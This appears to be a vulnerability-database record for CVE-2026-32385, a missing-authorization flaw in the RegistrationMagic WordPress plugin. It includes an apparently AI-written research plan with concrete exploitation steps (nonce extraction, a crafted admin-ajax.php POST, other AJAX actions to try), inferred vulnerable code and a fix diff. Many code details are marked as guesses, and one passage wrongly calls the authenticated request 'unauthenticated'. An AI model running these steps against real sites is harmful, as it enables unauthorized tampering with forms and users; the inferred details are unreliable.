[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f5f-7KQRoTmoWpu8zNEA1ZfT0Km_hWqrk735BrytDKeg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-32385","registrationmagic-missing-authorization-3","RegistrationMagic \u003C= 6.0.7.6 - Missing Authorization","The RegistrationMagic plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 6.0.7.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.","custom-registration-form-builder-with-submission-manager",null,"\u003C=6.0.7.6","6.0.7.7","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-18 00:00:00","2026-04-15 21:10:23",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F63099a49-913f-428d-b9a4-85e1bc5afe56?source=api-prod",57,[],"researched",false,3,"# Research Plan: CVE-2026-32385 RegistrationMagic Missing Authorization\n\n## 1. Vulnerability Summary\nThe **RegistrationMagic** plugin (versions \u003C= 6.0.7.6) suffers from a **Missing Authorization** vulnerability. The plugin registers several AJAX actions intended for administrative use but fails to implement proper capability checks (e.g., `current_user_can('manage_options')`) within the handler functions. This allows any authenticated user, including those with **Subscriber** roles, to execute administrative functions, specifically those related to form management and user status.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Authentication:** Required (Subscriber-level or higher).\n- **Vulnerable Action:** `rm_update_form_status` (Inferred based on typical RM AJAX patterns in the affected version).\n- **Parameters:**\n  - `action`: `rm_update_form_status`\n  - `form_id`: The ID of the target registration form.\n  - `status`: The new status to set (e.g., `0` for unpublished\u002Finactive, `1` for published\u002Factive).\n  - `rm_ajax_nonce`: The security nonce required for RM AJAX operations.\n\n## 3. Code Flow (Inferred)\n1. **Registration:** The plugin registers the AJAX hook in `includes\u002Fclass_rm_ajax.php` (or similar controller initialization):\n   ```php\n   add_action('wp_ajax_rm_update_form_status', array($this, 'rm_update_form_status'));\n   ```\n2. **Handler Implementation:** The function `rm_update_form_status` is located in `admin\u002Fcontrollers\u002Fclass_rm_form_controller.php` or `includes\u002Fcontrollers\u002Fclass_rm_main_controller.php`.\n3. **Missing Check:** The function likely calls `check_ajax_referer('rm_ajax_nonce', 'rm_ajax_nonce')` to verify the nonce but fails to call `current_user_can('manage_options')`.\n4. **Execution:** The handler proceeds to call a service method:\n   ```php\n   $service = new RM_Form_Service();\n   $service->update_form_status($form_id, $status);\n   ```\n5. **Impact:** An attacker can disable registration forms on the site or enable hidden\u002Finternal forms.\n\n## 4. Nonce Acquisition Strategy\nRegistrationMagic localizes its nonces and AJAX settings into a global JavaScript object. To obtain a valid nonce as a Subscriber:\n\n1. **Shortcode Identification:** The plugin's scripts are typically enqueued on pages containing a registration form shortcode: `[RM_Form id='FORM_ID']`.\n2. **Page Creation:** Use WP-CLI to create a page containing an existing form.\n3. **Browser Navigation:** Navigate to that page as the Subscriber user.\n4. **Nonce Extraction:** Use `browser_eval` to extract the nonce from the `rm_ajax_vars` or `rm_admin_vars` object.\n   - **Variable Name:** `rm_ajax_vars` (inferred from `RM_Utilities::localize_package()`).\n   - **Key:** `nonce`.\n   - **Command:** `browser_eval(\"window.rm_ajax_vars?.nonce\")`.\n\n## 5. Exploitation Strategy\n### Step 1: Discover Form ID\nFirst, identify a valid Form ID to target.\n- **WP-CLI:** `wp db query \"SELECT title, form_id FROM wp_rm_forms LIMIT 1;\"`\n\n### Step 2: Extract Nonce\nCreate a test page to load the RM environment and extract the nonce.\n- **Action:** Create a page with `[RM_Form id='TARGET_ID']`.\n- **Action:** Log in as Subscriber and navigate to the page.\n- **Action:** Run `browser_eval(\"window.rm_ajax_vars.nonce\")`.\n\n### Step 3: Trigger Unauthorized Action\nPerform a POST request to `admin-ajax.php` to deactivate a form.\n\n- **Request Type:** `POST`\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Content-Type:** `application\u002Fx-www-form-urlencoded`\n- **Body Parameters:**\n  ```text\n  action=rm_update_form_status&form_id=[TARGET_ID]&status=0&rm_ajax_nonce=[EXTRACTED_NONCE]\n  ```\n\n## 6. Test Data Setup\n1. **Target Form:** Create at least one RegistrationMagic form.\n   - `wp eval \"echo (new RM_Form_Service())->add(array('form_name' => 'Vulnerable Form', 'form_type' => 1));\"`\n   - Record the `form_id` (usually `1`).\n2. **Subscriber User:** Create a standard subscriber.\n   - `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n3. **Shortcode Page:** Create a page so the attacker can grab the nonce.\n   - `wp post create --post_type=page --post_status=publish --post_title=\"Register\" --post_content=\"[RM_Form id='1']\"`\n\n## 7. Expected Results\n- **HTTP Response:** A successful AJAX response from RM, usually returning a JSON object or string like `{\"success\":true}` or simply `1`.\n- **Plugin State:** The form with the specified ID should change its status in the database.\n\n## 8. Verification Steps\nAfter the exploit attempt, verify the form status change via WP-CLI:\n```bash\n# Check the 'form_active' column for the target form\nwp db query \"SELECT form_id, form_name, form_active FROM wp_rm_forms WHERE form_id = 1;\"\n```\nIf `form_active` is `0`, the exploit was successful.\n\n## 9. Alternative Approaches\nIf `rm_update_form_status` is not the target, try other administrative AJAX actions registered under `wp_ajax_*` without `nopriv` counterparts:\n- `rm_save_fab_settings`: Modifies the floating action button configuration.\n- `rm_set_default_form`: Changes which form is the primary registration form.\n- `rm_change_user_status`: Attempt to activate\u002Fdeactivate users (requires `user_id` parameter).\n\nCheck for the `current_user_can` call in `RM_Main_Controller.php` or `RM_Ajax.php`. If the parent class doesn't enforce it in the constructor or `init`, all child methods are potentially vulnerable.","RegistrationMagic versions up to and including 6.0.7.6 lack proper authorization checks on several AJAX actions, such as form status updates. This allows authenticated users with Subscriber-level permissions to perform administrative actions, like activating or deactivating forms, by leveraging nonces that are commonly exposed on public-facing registration pages.","\u002F\u002F File: admin\u002Fcontrollers\u002Fclass_rm_form_controller.php (inferred location)\npublic function rm_update_form_status() {\n    \u002F\u002F Nonce check is usually present, but capability check is missing\n    check_ajax_referer('rm_ajax_nonce', 'rm_ajax_nonce');\n\n    $form_id = isset($_POST['form_id']) ? intval($_POST['form_id']) : 0;\n    $status = isset($_POST['status']) ? intval($_POST['status']) : 0;\n\n    if ($form_id > 0) {\n        $service = new RM_Form_Service();\n        $service->update_form_status($form_id, $status);\n        echo \"1\";\n    }\n    wp_die();\n}","--- a\u002Fadmin\u002Fcontrollers\u002Fclass_rm_form_controller.php\n+++ b\u002Fadmin\u002Fcontrollers\u002Fclass_rm_form_controller.php\n@@ -24,6 +24,10 @@\n     public function rm_update_form_status() {\n         check_ajax_referer('rm_ajax_nonce', 'rm_ajax_nonce');\n \n+        if (!current_user_can('manage_options')) {\n+            wp_die(__('You do not have sufficient permissions to access this page.', 'registrationmagic-addon'));\n+        }\n+\n         $form_id = isset($_POST['form_id']) ? intval($_POST['form_id']) : 0;\n         $status = isset($_POST['status']) ? intval($_POST['status']) : 0;","To exploit this vulnerability, an attacker first identifies a target RegistrationMagic form ID (e.g., via brute force or public site inspection). As a subscriber, the attacker visits any page containing a RegistrationMagic shortcode to extract the 'rm_ajax_nonce' from the localized JavaScript variable 'rm_ajax_vars'. Using this nonce, the attacker sends an unauthenticated POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the 'action' set to 'rm_update_form_status', the 'form_id' of the target, and a 'status' value (0 to deactivate, 1 to activate). Because the handler fails to check for administrative capabilities, the plugin updates the form configuration in the database.","gemini-3-flash-preview","2026-04-19 05:25:27","2026-04-19 05:27:14",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","6.0.7.6","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustom-registration-form-builder-with-submission-manager\u002Ftags\u002F6.0.7.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcustom-registration-form-builder-with-submission-manager.6.0.7.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustom-registration-form-builder-with-submission-manager\u002Ftags\u002F6.0.7.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcustom-registration-form-builder-with-submission-manager.6.0.7.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustom-registration-form-builder-with-submission-manager\u002Ftags"]